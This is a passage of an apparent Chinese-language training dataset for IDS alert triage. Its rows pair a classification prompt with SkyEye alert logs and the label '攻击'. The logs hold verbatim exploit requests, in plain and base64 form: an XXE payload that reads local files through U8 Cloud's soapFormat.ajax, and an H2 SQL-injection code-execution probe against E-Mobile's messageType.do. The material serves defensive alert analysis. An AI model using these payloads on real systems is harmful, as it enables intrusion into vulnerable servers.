"rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_c90636af33ba7916f33461e16fbf5aae", "access_time": "2024-11-27 14:15:46", "content-length": "113", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/messageType.do", "src_mac": "00:94:a1:5e:6e:87", "file_name": "messageType.do", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /messageType.do HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 113\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "method=create&typeName=1';CREATE%20ALIAS%20sleep222%20FOR%20\"java.lang.Thread.sleep\";CALL%20sleep222(0);select+'1", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569445-Java代码执行攻击(机器学习)", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"java.lang.Thread.sl\", \"proto\": \"DNS\"}}", "sport": "12143", "h_url": "/messageType.do"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688146", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732688146, "vuln_harm": "任意文件读取,命令执行。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "", "hit_end": 0, "uri": "/uapws/soapFormat.ajax", "dport": 30001, "vuln_name": "XML外部实体注入(机器学习)", "rsp_status": 0, "code_language": "", "solution": "1.检查所使用的底层xml解析库,默认禁止外部实体的解析\r\n2.使用第三方应用代码及时升级补丁\r\n3.同时增强对系统的监控,防止此问题被人利用", "hit_start": 0, "detail_info": "XXE全称XML External Entity Injection即xml外部实体注入漏洞,触发点多位于xml文件上传点。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "XXE全称XML External Entity Injection即xml外部实体注入漏洞,触发点多位于xml文件上传点。", "public_date": "2020-11-25 19:47:28", "sport": 12147}, "detail_info": "XXE全称XML External Entity Injection即xml外部实体注入漏洞,触发点多位于xml文件上传点。", "file_md5": "d3daa88502a7b270d5ddeab762809488", "rule_key": "webids", "api": "218.76.15.56:30001/uapws/soapFormat.ajax", "first_access_time": "2024-11-27 14:15:46", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "XML外部实体注入(机器学习)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "361d0f018d97ae6e4017acf75a9215bc", "xff": "", "vuln_desc": "XXE全称XML External Entity Injection即xml外部实体注入漏洞,触发点多位于xml文件上传点。", "attack_chain": "0x02020000", "vuln_harm": "任意文件读取,命令执行。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688126", "code_language": "", "public_date": "2020-11-25 19:47:28", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/uapws/soapFormat.ajax", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b6d", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "XML外部实体注入(机器学习)", "attack_type": "敏感信息/重要文件泄漏", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.检查所使用的底层xml解析库,默认禁止外部实体的解析\r\n2.使用第三方应用代码及时升级补丁\r\n3.同时增强对系统的监控,防止此问题被人利用", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvdWFwd3Mvc29hcEZvcm1hdC5hamF4IEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDI1MQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "bXNnPTwhRE9DVFlQRSBmb29bPCFFTlRJVFkgeHhlMXR3byBTWVNURU0gImZpbGU6Ly8vYzovd2luZG93cy8iPiBdPjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIj48c29hcDpCb2R5Pjxzb2FwOkZhdWx0PjxmYXVsdGNvZGU+c29hcDpTZXJ2ZXIlMjZ4eGUxdHdvJTNiPC9mYXVsdGNvZGU+PC9zb2FwOkZhdWx0Pjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4lMGE=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_f11a5b6c51cc8886b1da3d9b5a5bb900", "access_time": "2024-11-27 14:15:46", "content-length": "251", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/uapws/soapFormat.ajax", "src_mac": "00:94:a1:5e:6e:87", "file_name": "soapFormat.ajax", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /uapws/soapFormat.ajax HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 251\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM \"file:///c:/windows/\"> ]><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569453-XML外部实体注入(机器学习)", "rule_labels": "{}", "sport": "12147", "h_url": "/uapws/soapFormat.ajax"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688146", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732688146, "vuln_harm": "任意文件读取,命令执行", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 49, "uri": "/uapws/soapFormat.ajax", "dport": 30001, "vuln_name": "XML外部实体注入攻击(XXE)", "rsp_status": 0, "code_language": "其他", "solution": "1.检查所使用的底层xml解析库,默认禁止外部实体的解析\r\n\r\n2.使用第三方应用代码及时升级补丁\r\n\r\n3.同时增强对系统的监控,防止此问题被人利用", "hit_start": 29, "detail_info": "XXE全称XML External Entity Injection即xml外部实体注入漏洞,触发点多位于xml文件上传点。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "XXE全称XML External Entity Injection即xml外部实体注入漏洞,触发点多位于xml文件上传点。", "public_date": "2018-07-09 18:16:10", "sport": 12147}, "detail_info": "XXE全称XML External Entity Injection即xml外部实体注入漏洞,触发点多位于xml文件上传点。", "file_md5": "d3daa88502a7b270d5ddeab762809488", "rule_key": "webids", "api": "218.76.15.56:30001/uapws/soapFormat.ajax", "first_access_time": "2024-11-27 14:15:46", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "XML外部实体注入攻击(XXE)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "b4aee280a92e8f2dbaf40fb4d3b72981", "xff": "", "vuln_desc": "XXE全称XML External Entity Injection即xml外部实体注入漏洞,触发点多位于xml文件上传点。", "attack_chain": "0x02020000", "vuln_harm": "任意文件读取,命令执行", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688126", "code_language": "其他", "public_date": "2018-07-09 18:16:10", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "49", "h_proto_version": "HTTP/1.1", "uri": "/uapws/soapFormat.ajax", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020529", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "XML外部实体注入攻击(XXE)", "attack_type": "敏感信息/重要文件泄漏", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.检查所使用的底层xml解析库,默认禁止外部实体的解析\r\n\r\n2.使用第三方应用代码及时升级补丁\r\n\r\n3.同时增强对系统的监控,防止此问题被人利用", "hit_start": "29", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvdWFwd3Mvc29hcEZvcm1hdC5hamF4IEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDI1MQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "bXNnPTwhRE9DVFlQRSBmb29bPCFFTlRJVFkgeHhlMXR3byBTWVNURU0gImZpbGU6Ly8vYzovd2luZG93cy8iPiBdPjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIj48c29hcDpCb2R5Pjxzb2FwOkZhdWx0PjxmYXVsdGNvZGU+c29hcDpTZXJ2ZXIlMjZ4eGUxdHdvJTNiPC9mYXVsdGNvZGU+PC9zb2FwOkZhdWx0Pjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4lMGE=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_faf4309dfbf8820490e7e2def74d9340", "access_time": "2024-11-27 14:15:46", "content-length": "251", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/uapws/soapFormat.ajax", "src_mac": "00:94:a1:5e:6e:87", "file_name": "soapFormat.ajax", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /uapws/soapFormat.ajax HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 251\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM \"file:///c:/windows/\"> ]><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567849-XML外部实体注入攻击(XXE)", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"schemas.xmlsoap.org\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12147", "h_url": "/uapws/soapFormat.ajax"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688146", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688146, "vuln_harm": "用友U8 Cloud soapFormat.ajax接口处存在 XXE漏洞,攻击者可通过该漏洞注入XML代码,进而在目标系统上执行任意命令。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 4, "uri": "/uapws/soapFormat.ajax", "dport": 30001, "vuln_name": "用友U8 Cloud XXE漏洞", "rsp_status": 0, "code_language": "", "solution": "官方已经修复漏洞,请升级到最新版本,链接:https://u8.yonyou.com/", "hit_start": 0, "detail_info": "用友U8 Cloud 提供企业级云ERP整体解决方案,全面支持多组织业务协同,实现企业互联网资源连接。 U8 Cloud 亦是亚太地区成长型企业最广泛采用的云解决方案。\r\n用友U8 Cloud soapFormat.ajax接口处存在 XXE漏洞,攻击者可通过该漏洞注入XML代码,进而在目标系统上执行任意命令。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "用友U8 Cloud 提供企业级云ERP整体解决方案,全面支持多组织业务协同,实现企业互联网资源连接。 U8 Cloud 亦是亚太地区成长型企业最广泛采用的云解决方案。\r\n用友U8 Cloud soapFormat.ajax接口处存在 XXE漏洞,攻击者可通过该漏洞注入XML代码,进而在目标系统上执行任意命令。", "public_date": "2024-05-29 09:47:24", "sport": 12147}, "detail_info": "用友U8 Cloud 提供企业级云ERP整体解决方案,全面支持多组织业务协同,实现企业互联网资源连接。 U8 Cloud 亦是亚太地区成长型企业最广泛采用的云解决方案。\r\n用友U8 Cloud soapFormat.ajax接口处存在 XXE漏洞,攻击者可通过该漏洞注入XML代码,进而在目标系统上执行任意命令。", "file_md5": "d3daa88502a7b270d5ddeab762809488", "rule_key": "webids", "api": "218.76.15.56:30001/uapws/soapFormat.ajax", "first_access_time": "2024-11-27 14:15:46", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "用友U8 Cloud XXE漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "36f11b5c161660f7246ce0cce02990a9", "xff": "", "vuln_desc": "用友U8 Cloud 提供企业级云ERP整体解决方案,全面支持多组织业务协同,实现企业互联网资源连接。 U8 Cloud 亦是亚太地区成长型企业最广泛采用的云解决方案。\r\n用友U8 Cloud soapFormat.ajax接口处存在 XXE漏洞,攻击者可通过该漏洞注入XML代码,进而在目标系统上执行任意命令。", "attack_chain": "0x02020000", "vuln_harm": "用友U8 Cloud soapFormat.ajax接口处存在 XXE漏洞,攻击者可通过该漏洞注入XML代码,进而在目标系统上执行任意命令。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688126", "code_language": "", "public_date": "2024-05-29 09:47:24", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "4", "h_proto_version": "HTTP/1.1", "uri": "/uapws/soapFormat.ajax", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021b61", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "用友U8 Cloud XXE漏洞", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "官方已经修复漏洞,请升级到最新版本,链接:https://u8.yonyou.com/", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvdWFwd3Mvc29hcEZvcm1hdC5hamF4IEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDI1MQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "bXNnPTwhRE9DVFlQRSBmb29bPCFFTlRJVFkgeHhlMXR3byBTWVNURU0gImZpbGU6Ly8vYzovd2luZG93cy8iPiBdPjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIj48c29hcDpCb2R5Pjxzb2FwOkZhdWx0PjxmYXVsdGNvZGU+c29hcDpTZXJ2ZXIlMjZ4eGUxdHdvJTNiPC9mYXVsdGNvZGU+PC9zb2FwOkZhdWx0Pjwvc29hcDpCb2R5Pjwvc29hcDpFbnZlbG9wZT4lMGE=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_eb15c28ca5d7a78f52ce07f7655b2a4e", "access_time": "2024-11-27 14:15:46", "content-length": "251", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/uapws/soapFormat.ajax", "src_mac": "00:94:a1:5e:6e:87", "file_name": "soapFormat.ajax", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /uapws/soapFormat.ajax HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 251\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM \"file:///c:/windows/\"> ]><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268573537-用友U8 Cloud XXE漏洞", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"schemas.xmlsoap.org\", \"proto\": \"DNS\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12147", "h_url": "/uapws/soapFormat.ajax"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688145", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688145, "vuln_harm": "泛微 e-mobile 存在远程代码执行漏洞,攻击者可以利用漏洞在目标系统上执行命令。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 24, "uri": "/messageType.do", "dport": 30001, "vuln_name": "泛微 E-Mobile 远程代码执行漏洞", "rsp_status": 0, "code_language": "", "solution": "官方暂未修复该漏洞,请关注官方动态:https://www.weaver.com.cn/", "hit_start": 4, "detail_info": "泛微 e-mobile 存在远程代码执行漏洞,攻击者可以利用漏洞在目标系统上执行命令。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "泛微 e-mobile 存在远程代码执行漏洞,攻击者可以利用漏洞在目标系统上执行命令。", "public_date": "2021-04-09 20:45:49", "sport": 12143}, "detail_info": "泛微 e-mobile 存在远程代码执行漏洞,攻击者可以利用漏洞在目标系统上执行命令。", "file_md5": "06846f571628dcbf4ae85a87ffe6abce", "rule_key": "webids", "api": "218.76.15.56:30001/messageType.do", "first_access_time": "2024-11-27 14:15:45", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "泛微 E-Mobile 远程代码执行漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "c7d6220d67fb2b87fbbe6f0511b3c3ab", "xff": "", "vuln_desc": "泛微 e-mobile 存在远程代码执行漏洞,攻击者可以利用漏洞在目标系统上执行命令。", "attack_chain": "0x02020000", "vuln_harm": "泛微 e-mobile 存在远程代码执行漏洞,攻击者可以利用漏洞在目标系统上执行命令。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688126", "code_language": "", "public_date": "2021-04-09 20:45:49", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "24", "h_proto_version": "HTTP/1.1", "uri": "/messageType.do", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020d46", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "泛微 E-Mobile 远程代码执行漏洞", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "官方暂未修复该漏洞,请关注官方动态:https://www.weaver.com.cn/", "hit_start": "4", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvbWVzc2FnZVR5cGUuZG8gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpDb250ZW50LUxlbmd0aDogMTEzDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "bWV0aG9kPWNyZWF0ZSZ0eXBlTmFtZT0xJztDUkVBVEUlMjBBTElBUyUyMHNsZWVwMjIyJTIwRk9SJTIwImphdmEubGFuZy5UaHJlYWQuc2xlZXAiO0NBTEwlMjBzbGVlcDIyMigwKTtzZWxlY3QrJzE=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_4b3974bf8f66deb266fd66406a7b8dc5", "access_time": "2024-11-27 14:15:45", "content-length": "113", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/messageType.do", "src_mac": "00:94:a1:5e:6e:87", "file_name": "messageType.do", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /messageType.do HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 113\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "method=create&typeName=1';CREATE%20ALIAS%20sleep222%20FOR%20\"java.lang.Thread.sleep\";CALL%20sleep222(0);select+'1", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569926-泛微 E-Mobile 远程代码执行漏洞", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"java.lang.Thread.sl\", \"proto\": \"DNS\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12143", "h_url": "/messageType.do"} | 攻击 |
